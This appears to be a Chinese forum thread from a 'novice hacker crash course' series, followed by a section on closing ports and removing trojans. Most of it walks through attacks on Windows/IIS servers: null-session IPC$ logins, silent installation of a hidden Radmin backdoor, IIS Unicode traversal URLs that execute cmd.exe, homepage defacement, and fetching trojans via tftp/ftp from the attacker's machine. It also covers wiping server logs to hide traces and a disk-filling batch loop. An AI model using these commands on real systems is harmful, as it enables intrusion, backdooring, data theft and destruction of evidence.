[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

3389替换服务-----------------------
中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
c:\winnt\system32\copy termsrv.exe service.exe
c:\winnt\system32\cd..
c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口转向：f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip"

使用空口令连接:
net use \\对方IP\ipc$ "" /user:"administrator"
(在上传文件的目录下)远程复制文件:
c:\radmin>net use \\a-01\ipc$ "12345" /user:administrator

c:\ramdin>copy r_server.exe \\a-01\admin$\system32
c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32
在对方CMD下：
c:\winnt\system32\>regedit /s radmin.reg
c:\winnt\system32\>r_server.exe /install /silenec
net start r_server

copy r_server.exe \\对方IP\admin$\system32
c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90


copy 文件名 \\IP\admin$\system32
进入对方CMD:
c:\opentelnet.exe \\Ip administrator "" 0 90
登陆CMD:
c:\telnet IP 90

安装RADMIN:
c:\winnt\system32\
r_server /install silence
c:\winnt\system32\
r-server
导入注册表:
c:\winnt\system32\regedit.exe /s aaa.reg
看端口:
c:\winnt\system32\
netstat -an
改端口:
c:\winnt\system32\
r_server.exe /port:1024 /pass:1234 /save /silence
起动服务:
c:\winnt\system32\net start r_server
隐藏文件:
c:\winnt\system32\attrib.exe +h r_server.exe +h

%systemroot$\system32

看看共享开了没有,没有的话把共享开开

c:\winnt\system32>net share
清单是空的。

c:\winnt\system32>net share ipc$
命令成功完成。
c:\winnt\system32>net share admin$
命令成功完成。

注册表运行命令
regedit

查看端口：netstat-n

SA传送文件TFTP
先在本机开tftp服务 sqlexec

tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe

撒旦

菜鸟黑客速成（八）
端口的使用
首先我们我们要找一台主机来练手，随便挑吧！www.flyingfish.com(乱说的)第一部，呵呵， 先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后， 我们应该知道它的ip,很简单，ping它一下就可以了。ping http://www.flyingfish.com，看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；第二，该主机装了防火墙禁止ping,不过这种可能很小。知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

21--ftp 重要哦

23--telnet 欢呼吧

25-smtp 尽管重要，但似乎没什么可利用的 53--domain 同上

79--finger 可知道用户信息了

80--http 要看网页，没它不行吧

110--pop 收信的

139--netbios 共享用的，很有利用价值哦

3389--win2000超级终端 呵呵，这个好！

其实端口有上千种，这些最最常用我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）那么我们该如何应对呢？ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望telnet在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码？看来网管还不是超级白痴：）随便猜个，错了，闪人！

二，一切从基础开始

由于winntsystem32cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞） 11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

Directory of C:inetpubscripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！就是这种感觉！

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

http://11.11.22.22/msadc/......t/system32/cmd.exe?/c+dir （这个命令同样道理）

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe

会dos的朋友一定懂其意义了，不懂的请去看书 .

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

三，实战演练

1，修改主页！（是不是很爽？）

一般主页位置在c:inetpubwwwroot下，但要是改了路径，就需要找找了。

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏览器里 便会显示主页路径，这个漏洞存在率很高，自然是我们的首选。

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm 那么我们就修改它吧！

最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:autoexec.bat 就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm 回应为：HTTP 500 - 内部服务器错误 通过对cmd的分析，袁哥得出一条简便的方法，加入"符号
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:inetpubwwwrootindex.htm

回应为：cgi错误，不用理会

两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧 而在实际操作中，可能袁哥的方法也会失效，这时，我们就可以copy cmd.exe为另一个exe，记住路径，用copy后的来echo

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm

2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，

那就应该用改好的主页上传，这个我们后面介绍。

几点忠告：

1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

2，echo前记得帮他们做好备份

3，不准在主页里加入恶性语句

2，下载文件

要是有什么有用的文件被你发现，那我们如何下载呢？ 最简单的方法：把文件copy至网页目录下。copy c:emailbaby.eml c:inetpubwwwrootbaby.zip,然后， 下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。 别的方法：对不起，没想好：）

3，最重要的上传

一般方法：ftp法

首先建一个ftp脚本文件：c:hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

echo+open ftp.cshu.com（ftp主机） > c:hehe.haha

echo+user yourname >> cc:hehe.haha (yourname是用户名)

echo+yourpasswd >> c:hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:hehe.haha 要下载的文件

echo+quit >> c:hehe.haha

完了以后：ftp+/s:c:hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe

就会出现在当前目录了（也就是cmd所在目录）

别忘了先上传到ftp主机，不要做马大哈哦！

最简单的方法：tftp法。

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，

利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：）

安装好后运行，别忘了设置好默认目录，否则会找不到文件 tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:winntihateu.exe（ihateu.exe在默认目录里） 1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！ 学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）


4，如何清除痕迹

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！

C:winntsystem32logfiles*.*

C:winntssytem32config*.evt

C:winntsystem32dtclog*.*

C:winntsystem32*.log

C:winntsystem32*.txt

C:winnt*.txt

C:winnt*.log

全……擦掉！

四，细节问题。

1，遇到长文件名怎么办？

c:program files

就用c:"program20%files"

2，遇到空格怎么办？

20%代替喽，或者xx yy=xxyy~1

3,如何做个很大的文件？

目的就是破坏啦！我不喜欢不过教教你们啦

@echo off

echo big > c:a.a

:h

copy c:a.a+c:a.a c:a.a

goto h

注意不要乱来啊！

4，输入命令，没反应或反应不对。

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！

看在你看到这里那么给我面子的份上，在给你几个吧！

http://www.exsample.com/m......ystem32/cmd.exe?/c+dir+c: 或http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c: 或http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:

不一定有用哦！

5，如何找到unicode漏洞的主机

呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：）

不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

撒旦

菜鸟黑客速成（九）
常用端口关闭方法
113端口木马的清除（仅适用于windows系统）：
这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口
2.使用fport命令察看出是哪个程序在监听113端口
fport工具下载
例如我们用fport看到如下结果：
Pid Process Port Proto Path
392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe

我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为c:\winnt\system32下。
3.确定了木马程序名（就是监听113端口的程序）后，在任务管理器中查找到该进程， 并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序，在注册表里查找刚才找到那个程序， 并将相关的键值全部删掉。
5.到木马程序所在的目录下删除该木马程序。（通常木马还会包括其他一些程序，如rscan.exe、psexec.exe、ipcpass.dic、ipcscan.txt等，根据
木马程序不同，文件也有所不同，你可以通过察看程序的生成和修改的时间来确定与监听113端口的木马程序有关的其他程序）
6.重新启动机器。

3389端口的关闭：
首先说明3389端口是windows的远程管理终端所开的端口，它并不是一个木马程序，请先确定该服务是否是你自己开放的。如果不是必须的，请关闭该服务。

win2000关闭的方法：
win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。
win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services 服务项，选中属性选项将启动类型改成手动，并停止该服务。
winxp关闭的方法：
在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

4899端口的关闭：
首先说明4899端口是一个远程控制软件（remote administrator)服务端监听的端口，他不能算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的，请先确定该服务是否是你自己开放并且是必需的。如果不是请关闭它。

关闭4899端口：
请在开始-->运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统安装目录），输入r_server.exe /stop后按回车。
然后在输入r_server /uninstall /silence 到C:\winnt\system32(系统目录）下删除r_server.exe admdll.dll radbrv.dll三个文件

5800，5900端口：
1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置（通常会是c:\winnt\fonts\ explorer.exe)
2.在任务管理器中杀掉相关的进程（注意有一个是系统本身正常的，请注意！如果错杀可以重新运行c:\winnt\explorer.exe)
3.删除C:\winnt\fonts\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中的Explorer项。
5.重新启动机器。

6129端口的关闭：
首先说明6129端口是一个远程控制软件（dameware nt utilities)服务端监听得端口，他不是一个木马程序，但是具有远程控制功能，通常的杀毒软件是无法查出它来的。请先确定该服务是否是你自己安装并且是必需的，如果不是请关闭。

关闭6129端口：
选择开始-->设置-->控制面板-->管理工具-->服务 找到DameWare Mini Remote Control项点击右键选择属性选项，将启动类型改成禁用后停止该服务。
到c:\winnt\system32(系统目录）下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DWMRCS表项删除。

1029端口和20168端口：

这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见：Lovgate蠕虫：http://it.rising.com.cn/newSite/ ... rus/Antivirus_Base/TopicExplorerPagePackage/lovgate.htm
你可以下载专杀工具：http://it.rising.com.cn/service/ ... ovGate_download.htm
使用方法：下载后直接运行，在该程序运行结束后重起机器后再运行一遍该程序。

45576端口：

这是一个代理软件的控制端口，请先确定该代理软件并非你自己安装（代理软件会给你的机器带来额外的流量）

关闭代理软件：
1.请先使用fport察看出该代理软件所在的位置
2.在服务中关闭该服务（通常为SkSocks），将该服务关掉。
3.到该程序所在目录下将该程序删除。
对于139端口攻击的防范针对不同系统的设置也有所不同，下面就来分别描述。
　　针对使用Windows 9x系统拨号上网用户，可以不必登录到NT局域网络环境，打开控制面板，然后双击“网络”图标，在“主网络登录”中选择“Microsoft友好登录”，不必选择“Windows网络用户”方式。此外，也不必设置“文件打印共享” 对于Windows NT用户，可以取消NetBIOS与TCP/IP协议的绑定，打开“控制面板”，然后双击“网络”图标，在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”，并重新启动计算机即可。

Windows 2000用户可以使用鼠标右键单击“网络邻居”图标，然后选择“属性”命令，打开“网络和拨号连接”对话框，用鼠标右键单击“本地连接”图标，然后执行“属性”命令，打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”，在打开的对话框中单击［高级］按钮。打开“高级TCP/IP设置”对话框，选择“选项”选项卡，在列表中单击选中“TCP/IP筛选”选项单击［属性］按钮，在“只允许”单击［添加］按钮，填入除了139之外要用到的端口。
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”，选择一条空规则，设置数据包方向为“接收”，对方IP地址选“任何地址”，协议设定为“TCP”，本地端口设置为“139到139”，对方端口设置为“0到0”，设置标志位为“SYN”，动作设置为“拦截”，最后单击［确定］按钮，并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了

xxdbq

顶一下.希望版主能加我为好友.好向你学习一下.现在只是个菜鸟.我的Q634****0003

memphis

顶下~！！！多谢你的指教！！！！